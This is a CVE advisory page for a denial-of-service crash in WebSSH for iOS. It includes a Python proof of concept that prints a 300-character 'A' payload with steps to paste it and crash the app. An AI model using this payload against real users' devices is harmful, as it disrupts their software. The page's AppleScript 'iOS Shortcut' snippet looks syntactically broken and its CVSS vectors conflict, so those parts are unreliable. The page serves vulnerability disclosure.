Security Vulnerability Report
CVE-2021-47827 CVSS 7.5 HIGH

Published: 2026-01-16 19:16:08
Last Modified: 2026-04-15 00:35:42

Description

WebSSH for iOS 14.16.10 contains a denial of service vulnerability in the mashREPL tool that allows attackers to crash the application by pasting malformed input. Attackers can trigger the vulnerability by copying a 300-character buffer of repeated 'A' characters into the mashREPL input field, causing the application to crash.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

WebSSH for iOS <= 14.16.10

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
# CVE-2021-47827 PoC - WebSSH for iOS mashREPL DoS
# Generate 300 'A' characters to trigger the vulnerability


def generate_dos_payload():
    """
    Generate malformed input to trigger DoS in WebSSH for iOS mashREPL
    The vulnerability is triggered by pasting a 300-character buffer of repeated 'A' characters
    """
    # 300 'A' characters payload
    payload = 'A' * 300

    # Print the payload so it can be copied by hand (for manual testing on iOS device);
    # nothing is placed on the clipboard by this script
    print(f"Generated payload length: {len(payload)}")
    print(f"Payload content: {payload}")
    print("\nTo exploit:")
    print("1. Copy the above payload")
    print("2. Open WebSSH for iOS app")
    print("3. Navigate to mashREPL tool")
    print("4. Paste the payload into the input field")
    print("5. Application should crash immediately")

    return payload


def generate_ios_shortcut_script():
    """
    Generate an iOS Shortcut script for automated exploitation
    This can be used to demonstrate the vulnerability on iOS devices
    """
    # Returned as text only; this function is never called by the script below
    script = '''
on run
    set payload to "" & (character id 65 as text) repeated 300 times
    set the clipboard to payload
    tell application "WebSSH for iOS" to activate
    -- User needs to manually paste in mashREPL
end run
'''
    return script


if __name__ == "__main__":
    payload = generate_dos_payload()
    print("\n" + "=" * 60)
    print("CVE-2021-47827 PoC - WebSSH for iOS mashREPL DoS")
    print("CVSS Score: 7.5 (High)")
    print("=" * 60)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2021-47827", "sourceIdentifier": "[email protected]", "published": "2026-01-16T19:16:07.703", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "WebSSH for iOS 14.16.10 contains a denial of service vulnerability in the mashREPL tool that allows attackers to crash the application by pasting malformed input. Attackers can trigger the vulnerability by copying a 300-character buffer of repeated 'A' characters into the mashREPL input field, causing the application to crash."}, {"lang": "es", "value": "WebSSH para iOS 14.16.10 contiene una vulnerabilidad de denegación de servicio en la herramienta mashREPL que permite a los atacantes bloquear la aplicación al pegar una entrada malformada. Los atacantes pueden activar la vulnerabilidad al copiar un búfer de 300 caracteres de caracteres 'A' repetidos en el campo de entrada de mashREPL, lo que provoca que la aplicación se bloquee."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 4.6, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": 
"NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-1284"}]}], "references": [{"url": "https://apps.apple.com/mx/app/webssh-ssh-client/id497714887", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/49883", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/webssh-for-ios-mashrepl-denial-of-service", "source": "[email protected]"}]}}